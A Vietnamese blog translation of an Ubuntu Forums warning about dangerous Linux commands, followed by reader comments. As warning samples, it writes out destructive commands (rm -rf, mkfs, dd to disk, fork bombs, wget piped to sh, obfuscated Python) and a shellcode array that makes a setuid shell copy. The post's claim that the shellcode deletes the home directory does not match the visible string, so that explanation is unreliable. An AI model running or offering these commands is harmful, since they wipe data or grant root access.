Những mã nguy hiểm

Cảnh báo về những mã nguy hiểm

nguồn:http://ubuntuforums.org/announcement.php?a=54
Ngày càng nhiều những câu lệnh nguy hiểm mà có thể gây hại nghiêm trọng đến máy tính.Tôi xin nhắc các bạn hãy thận trọng khi ai đó bảo bạn hãy chạy một vài câu lệnh hay download scripts. Khi không chắc chắc an toàn, tốt nhất hãy đợi để có thêm ý kiến, sự giải thích hợp lý.Dưới đây là một số ví dụ phổ biến về những lệnh nguy hiểm.

Xin nói rõ đây là những mã thật sự nguy hiểm, không phải trò đùa, và đừng ngốc đến mức copy & paste những câu lệnh này!!!

DANGEROUS COMMANDS — look but DO NOT RUN.

Đây chỉ là một số ít, nhưng có thể giúp cho bạn nhận ra những cách mà chúng lừa bạn làm . Những câu lệnh này cũng có thể được giấu kỹ trong một đoạn mã,tiến trình rất dài do đó hãy thận trọng những dòng code cuối khi bạn cảm thấy có điều gì đó bất thường.

Xoá tất cả các files, xoá thư mục hiện hành…

Code:

rm -rf /    (lệnh này có thể xoá cả hệ thống- cần quyền root)
rm -rf .    (xoá thư mục hiện hành)
rm -rf *    (xoá các files trong thư mục hiện hành)
rm -rf ~    (xoá home directory của user) - không cần quyền root

Reformat: Dữ liệu trên thiết bị sau lệnh mkfs sẽ bị mất sạch

Code:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Do raw data được ghi vào block device. Nhiều lần liên tục có thể dẫn đến mất dữ liệu

Code:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Chạy 1 số lượng lớn tiến trình đến khi hệ thống bị đông cứng, buộc bạn phải reset lại máy -> có thể gây hư hỏng dữ liệu, hoặc 1 số thứ khác.

Trong Bourne shells, như Bash: (Cái này trông có thể rất hấp dẫn, kích thích tính tò mò)

Code:

:(){:|:&};:

In Perl

Code:

fork while fork

Tarbomb: Ai đó bảo bạn hãy giải nén 1 file tar vào 1 thư mục đã có sẵn. Từ file đó có thể bung ra hàng triệu files hay thêm những files đã bị sửa đổi vào hệ thống. Bạn nên tập thói quen giải nén vào 1 thư mục rỗng.

Decompression bomb: Thậm chí khi giải nén có thể lên đến vài trăm GB dù khi download dung lượng rất nhỏ, làm đầy đĩa cứng. Bạn không nên lấy dữ liệu từ những nguồn không đáng tin cậy.

Shellscript: Ai đó đưa bạn 1 shellscript và bảo bạn chạy nó. Nó có thể chứa những đoạn mã mà hắn lựa chọn — có thể là tốt hay xấu. Đừng chạy code từ những người không đáng tin.

Code:

wget http://some_place/some_file
sh ./some_file

Code:

wget http://some_place/some_file -O- | sh

Compiling code: Ai đó đưa bạn source code và bảo bạn compile. Rất dễ dàng che giấu những code nguy hiểm như một phần nhỏ của source code rất lớn. Đừng chạy compiled code trừ khi đó là những ứng dụng có tên tuổi , lấy từ những nơi tin cậy (i.e. SourceForge, the author’s homepage, distro address).

Một ví dụ khá nổi tiếng , nguỵ trang để đòi hỏi quyền root mà không cần shell:

 

Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p

release */

                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"

                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"

                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"

                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"

                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"

                  "cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";

Với những người mới, cái này giống như một đoạn code vô nghĩa . Tuy nhiên nó lại chạy lệnh rm -rf ~ / & và sẽ phá huỷ hoàn toàn thư mục home của người dùng , thậm chí sẽ xoá tất cả hết là root. Xin hãy nhớ rằng, những thứ như thế này có dạng rất lạ.

Nhắc lại, ở đây không phải là tất cả để bạn có thể dựa vào mà đ1nh giá 1 đoạn code có nguy hiểm hay không.

Một ví dụ có thể làm rất nhanh trong Python

Code:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

“sn!.sg!+” đơn giản là rm -rf * shifted 1 ký tự.

——-

Tôi không hy vọng sẽ có ai đó paste những đoạn code này vào terminal một chút nào. __________________

Người dịch: silverhat

Advertisements

4 phản hồi to “Những mã nguy hiểm”

  1. afterlastangel Says:

    Chán quá sao chạy ko được nhỉ. Có lệnh nào ngon ngon chạy trong CMD không :P.

  2. zicken Says:

    hè hè, trong cmd thì qué trùi :D.

  3. slash9x Says:

    cảm ơn bác rất nhiều, em phải bookmark ngay cái trang này mới được. Bác ko phiền nếu em copy bài này lên WordPress của em chứ, em sẽ ghi rõ nguồn đàng hoàng 😀

  4. Recent Links Tagged With "forkbomb" - JabberTags Says:

    […] public links >> forkbomb Những mã nguy hiểm Saved by vegeta3986 on Mon 17-11-2008 Dangerous commands for Linux users 🙂 Saved by regul8or on […]


Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: